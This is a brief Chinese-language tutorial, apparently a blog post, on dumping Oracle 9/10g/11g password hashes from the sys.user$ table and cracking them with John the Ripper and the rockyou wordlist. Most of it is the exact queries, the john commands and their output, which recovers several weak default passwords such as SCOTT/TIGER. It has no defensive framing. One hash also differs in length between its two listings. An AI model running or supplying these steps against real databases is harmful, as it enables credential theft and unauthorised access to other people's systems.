查询oracle密码语句：

oracle 9,10g：select name,password from sys.user$
oracle 11g：select name, password, spare4 from sys.user$ oracle 11g可用thc-orakelcrackert11g破解。

这里先介绍oracle 9,10g的破解方法：
select name,password from sys.user$
SCOTT,F894844C34402B67
SYS,E0F3062B9648608A
SYSTEM,7AD9669C7FE693C1
DBSNMP,E066D214D5421CCC
PROD,2E817F456CE5A4EC
TEST,7A0F2B316C212D6

把密码信息保存到xxx.txt
$cat xxx.txt
SCOTT:F894844C34402B67
SYS:E0F3062B9648608A
SYSTEM:7AD9669C7FE693C1
DBSNMP:E066D214D5421CCC
PROD:2E817F456CE5A4EC
TEST:7A0F2B316C212D6F

破解：
$john xxx.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=oracle
Loaded 6 password hashes with 6 different salts (Oracle [oracle])
TIGER (SCOTT)
DBSNMP (DBSNMP)
TEST (TEST)
guesses: 3 time: 0:00:00:00 100% c/s: 133842 trying: ZHONGGUO

$john --i xxx.txt
Loaded 3 password hashes with 3 different salts (Oracle [oracle])
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
PROD (PROD)
...